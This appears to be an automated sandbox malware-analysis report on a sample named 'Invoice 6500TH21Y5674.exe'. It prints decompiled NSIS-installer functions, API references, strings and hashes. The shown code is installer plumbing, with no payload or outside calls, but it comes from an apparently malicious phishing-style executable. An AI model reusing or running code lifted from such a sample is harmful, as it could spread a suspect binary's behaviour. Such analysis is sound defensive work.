				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405AD9(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405A97("*?|<>/\":", _t5))) == 0) {
							E00405C28(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004063b1
0x004063b9
0x004063cd
0x004063cd
0x004063d3
0x004063e0
0x004063e0
0x004063e1
0x004063e3
0x004063e7
0x004063e9
0x004063f2
0x004063f4
0x0040640e
0x00406416
0x00406416
0x0040641b
0x0040641d
0x0040641f
0x00406423
0x00406424
0x00406427
0x0040642f
0x00406431
0x00406435
0x00000000
0x00000000
0x0040643b
0x00406440
0x00000000
0x00000000
0x00000000
0x00406440
0x00406445

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406407
CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406414
CharNextA.USER32(?,"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406419
CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403300,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403537,?,00000007,00000009,0000000B), ref: 00406429

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004063B0
*?|<>/":, xrefs: 004063F7
"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" , xrefs: 004063EB

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-685933029
Opcode ID: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
Instruction ID: 4c47756038ac22285ba0d5cec53aa64a9461198f7a7023556037c09898c6efe2
Opcode Fuzzy Hash: 6d9cd5a565d063f7c871d931481108c2ccc59b6be6080685bd61ccbc84ff8956
Instruction Fuzzy Hash: 5B11B6514047A129EB3216285C40B77BF888B97760F19407BE8D2722C2D77C5C5297BD

Uniqueness

Uniqueness Score: -1.00%

Function 004041BF, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004041BF(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x004041d1
0x00404287
0x00000000
0x00404287
0x004041e2
0x004041e6
0x00000000
0x00404200
0x00404200
0x00404209
0x00000000
0x00000000
0x0040420b
0x00404217
0x0040421a
0x0040421a
0x00404220
0x00404226
0x00404226
0x00404232
0x00404238
0x0040423f
0x00404242
0x00404245
0x00404247
0x00404247
0x0040424f
0x00404255
0x00404255
0x0040425f
0x00404264
0x00404267
0x0040426c
0x0040426f
0x0040426f
0x0040427f
0x0040427f
0x00000000
0x00404282

APIs

GetWindowLongA.USER32 ref: 004041DC
GetSysColor.USER32(00000000), ref: 0040421A
SetTextColor.GDI32(?,00000000), ref: 00404226
SetBkMode.GDI32(?,?), ref: 00404232
GetSysColor.USER32(?), ref: 00404245
SetBkColor.GDI32(?,?), ref: 00404255
DeleteObject.GDI32(?), ref: 0040426F
CreateBrushIndirect.GDI32(?), ref: 00404279

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction ID: 0c29b1994579108119522ba9b7e42ccb12df1f79812dc60d22c4570354a7e24a
Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction Fuzzy Hash: 6021A4B16007049BCB309F78DD08B5BBBF8AF81754B14896EFD92A26E0C734E904CB54

Uniqueness

Uniqueness Score: -1.00%

Function 72AB24D8, Relevance: 10.6, APIs: 7, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E72AB24D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E72AB1215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M72AB2626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x72ab307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x72ab309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E72AB1429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x72ab405c);
								goto L17;
							case 4:
								__ecx =  *0x72ab405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x72ab405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x72ab405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x72ab4000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E72AB12D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E72AB1266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}

0x72ab24e4
0x72ab24e6
0x72ab24f0
0x72ab24f6
0x72ab2500
0x72ab2504
0x72ab2509
0x72ab2509
0x72ab2511
0x72ab2518
0x72ab251e
0x00000000
0x72ab2525
0x00000000
0x00000000
0x72ab252c
0x72ab2530
0x72ab2533
0x72ab2537
0x72ab253e
0x72ab2542
0x72ab2548
0x72ab254a
0x72ab254c
0x72ab254c
0x72ab2553
0x00000000
0x00000000
0x72ab255c
0x00000000
0x00000000
0x72ab256c
0x00000000
0x00000000
0x72ab2598
0x72ab25a0
0x72ab25aa
0x72ab25ac
0x72ab25b1
0x00000000
0x00000000
0x72ab2574
0x72ab2578
0x72ab257a
0x72ab257b
0x72ab257d
0x72ab258d
0x72ab2594
0x00000000
0x00000000
0x72ab25b7
0x72ab25b9
0x72ab25bf
0x72ab25c5
0x72ab25c5
0x00000000
0x00000000
0x72ab251e
0x72ab25c8
0x72ab25c8
0x72ab25cd
0x72ab25de
0x72ab25de
0x72ab25e4
0x72ab25e9
0x72ab25ee
0x72ab25fa
0x72ab25ff
0x00000000
0x72ab2604
0x72ab25f0
0x72ab25f1
0x72ab2605
0x72ab2605
0x72ab25ee
0x72ab2606
0x72ab260a
0x72ab260d
0x72ab2625

APIs

Part of subcall function 72AB1215: GlobalAlloc.KERNEL32(00000040,72AB1233,?,72AB12CF,-72AB404B,72AB11AB,-000000A0), ref: 72AB121D

GlobalFree.KERNEL32 ref: 72AB25DE
GlobalFree.KERNEL32 ref: 72AB2618

Memory Dump Source

Source File: 00000000.00000002.688800351.0000000072AB1000.00000020.00020000.sdmp, Offset: 72AB0000, based on PE: true

Associated: 00000000.00000002.688792553.0000000072AB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688807982.0000000072AB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688815540.0000000072AB5000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9034a3be15f88567e82e349d00d846e169bc8248e423252755217931f4d3de5d
Instruction ID: 845b29b89ef7b73634f91601dd850887c03299a1581f6ed9aba8ea36ceeffe00
Opcode Fuzzy Hash: 9034a3be15f88567e82e349d00d846e169bc8248e423252755217931f4d3de5d
Instruction Fuzzy Hash: 0B419F72944280EFD3028F59CDE4D6ABBBEEF89304B104A2EF54286128D73DE915DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00404AAB, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404AAB(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404ab9
0x00404ac6
0x00404acc
0x00404b0a
0x00404b0a
0x00404b19
0x00404b20
0x00000000
0x00404b22
0x00404ace
0x00404add
0x00404ae5
0x00404ae8
0x00404afa
0x00404b00
0x00404b07
0x00000000
0x00404b07
0x00000000

APIs

SendMessageA.USER32 ref: 00404AC6
GetMessagePos.USER32 ref: 00404ACE
ScreenToClient.USER32 ref: 00404AE8
SendMessageA.USER32 ref: 00404AFA
SendMessageA.USER32 ref: 00404B20

Strings

f, xrefs: 00404AFC

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction ID: 246458a00becd8bf3e45cced134e1bc678ff0f74541da5adfbd61824d77d36c3
Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction Fuzzy Hash: BC015E71900219BADB00DBA4DD85BFFBBBCAF55B11F10012BBB40B61D0C7B4A941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402DBA, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x792118; // 0x8c00
					_t11 =  *0x79e124;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402dc7
0x00402dd5
0x00402ddb
0x00402ddb
0x00402de9
0x00402deb
0x00402df1
0x00402df8
0x00402dfa
0x00402dfa
0x00402e10
0x00402e20
0x00402e32
0x00402e32
0x00402e3a

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
MulDiv.KERNEL32(00008C00,00000064,?), ref: 00402E00
wsprintfA.USER32 ref: 00402E10
SetWindowTextA.USER32(?,?), ref: 00402E20
SetDlgItemTextA.USER32 ref: 00402E32

Strings

verifying installer: %d%%, xrefs: 00402E0A

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 0d8e9bd33d69446e06833ca67107590e0434e761be11da362e4462339046e7f4
Instruction ID: 5b578c44cce9eb850d5b1a327d08a3d6af9bf3f213875045bca18d45615f3dab
Opcode Fuzzy Hash: 0d8e9bd33d69446e06833ca67107590e0434e761be11da362e4462339046e7f4
Instruction Fuzzy Hash: 6601447064020DFBEF109F60DE09EAE3769AB04304F00803AFA06A51D0DBB899519B5D

Uniqueness

Uniqueness Score: -1.00%

Function 72AB22F1, Relevance: 9.1, APIs: 6, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E72AB22F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E72AB12AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E72AB123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M72AB247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E72AB12FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E72AB12FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E72AB1224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x72ab405c =  *0x72ab405c +  *0x72ab405c;
									__edi = GlobalAlloc(0x40,  *0x72ab405c +  *0x72ab405c);
									 *0x72ab405c = MultiByteToWideChar(0, 0, __ebx,  *0x72ab405c, __edi,  *0x72ab405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E72AB12FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x72ab405c;
									__esi = __esi +  *0x72ab4064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E72AB1429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E72AB1224(0x72ab4034);
					goto L10;
				}
			}

0x72ab2306
0x72ab230a
0x72ab2315
0x72ab2315
0x72ab231c
0x72ab2321
0x00000000
0x00000000
0x72ab2325
0x72ab2328
0x00000000
0x00000000
0x72ab232d
0x72ab2338
0x72ab2348
0x72ab233f
0x72ab2341
0x72ab2357
0x72ab2357
0x00000000
0x72ab232f
0x72ab232f
0x72ab2358
0x72ab235c
0x72ab235e
0x72ab235e
0x72ab2361
0x72ab2361
0x72ab2369
0x72ab236c
0x72ab2373
0x72ab2377
0x72ab2446
0x72ab2447
0x72ab2452
0x72ab247d
0x72ab247d
0x72ab2462
0x72ab246e
0x72ab2464
0x72ab2464
0x72ab2464
0x00000000
0x72ab237d
0x72ab237d
0x00000000
0x72ab2384
0x00000000
0x00000000
0x72ab238d
0x00000000
0x00000000
0x72ab239b
0x72ab239e
0x00000000
0x00000000
0x72ab23a7
0x72ab23ac
0x72ab23af
0x72ab23b0
0x00000000
0x00000000
0x72ab23bd
0x72ab23c8
0x72ab23d7
0x72ab23e2
0x72ab2405
0x72ab2408
0x72ab23e4
0x72ab23e8
0x72ab23ee
0x72ab23ef
0x72ab23f2
0x72ab23f3
0x72ab23f6
0x72ab23fd
0x72ab23fd
0x00000000
0x00000000
0x72ab2410
0x72ab2413
0x72ab241f
0x72ab2421
0x00000000
0x00000000
0x72ab2424
0x72ab2427
0x72ab2428
0x72ab242f
0x72ab2436
0x72ab2439
0x72ab243b
0x72ab243e
0x00000000
0x00000000
0x72ab237d
0x72ab2377
0x72ab234d
0x72ab2352
0x00000000
0x72ab2352

APIs

GlobalFree.KERNEL32 ref: 72AB2447

Part of subcall function 72AB1224: lstrcpynA.KERNEL32(00000000,?,72AB12CF,-72AB404B,72AB11AB,-000000A0), ref: 72AB1234

GlobalAlloc.KERNEL32(00000040,?), ref: 72AB23C2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 72AB23D7
GlobalAlloc.KERNEL32(00000040,00000010), ref: 72AB23E8
CLSIDFromString.OLE32(00000000,00000000), ref: 72AB23F6
GlobalFree.KERNEL32 ref: 72AB23FD

Memory Dump Source

Source File: 00000000.00000002.688800351.0000000072AB1000.00000020.00020000.sdmp, Offset: 72AB0000, based on PE: true

Associated: 00000000.00000002.688792553.0000000072AB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688807982.0000000072AB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.688815540.0000000072AB5000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: d35e1e6817a6b95eb40a6cc0bfd6187afd2aa73a7c80c0e73089aff493018de8
Instruction ID: b69908b105d060b8d16ed14f83ee4b247cde5c4d419de509da4ebc1b618ee052
Opcode Fuzzy Hash: d35e1e6817a6b95eb40a6cc0bfd6187afd2aa73a7c80c0e73089aff493018de8
Instruction Fuzzy Hash: 4F419AB2948381DFD3118F29C984B6ABBFDFF48311F10486EE456C69A8DB38D545CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004027DF(int __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405AD9(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405C48(_t50);
				_t26 = E00405C6D(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x7a2f78;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E004032DD(_t45);
						E004032C7(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004030D8( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405C28( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405D14( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004030D8(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004027df
0x004027e1
0x004027ed
0x004027f0
0x004027fa
0x004027fe
0x004027fe
0x00402804
0x00402811
0x00402819
0x0040281c
0x00402822
0x00402830
0x00402835
0x00402839
0x0040283c
0x00402845
0x00402851
0x00402855
0x00402858
0x00402862
0x00402887
0x00402869
0x0040286e
0x00402876
0x0040287c
0x00402881
0x00402881
0x0040288e
0x0040288e
0x0040289b
0x004028a1
0x004028b3
0x004028b3
0x004028b9
0x004028b9
0x004028c4
0x004028c5
0x004028c9
0x004028cd
0x004028d3
0x004028d3
0x004028da
0x004022dd
0x00402a5d
0x00402a69

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
GlobalFree.KERNEL32 ref: 0040288E
GlobalFree.KERNEL32 ref: 004028A1
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD

Memory Dump Source

Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 5755665d5a07ff276816291a20f7fda962d058b8d5726ef8cf218c2b9027c82a
Instruction ID: 541bef3258e2720658000fa94f276f2b73ea2b938264a1111491e3e624c892cf
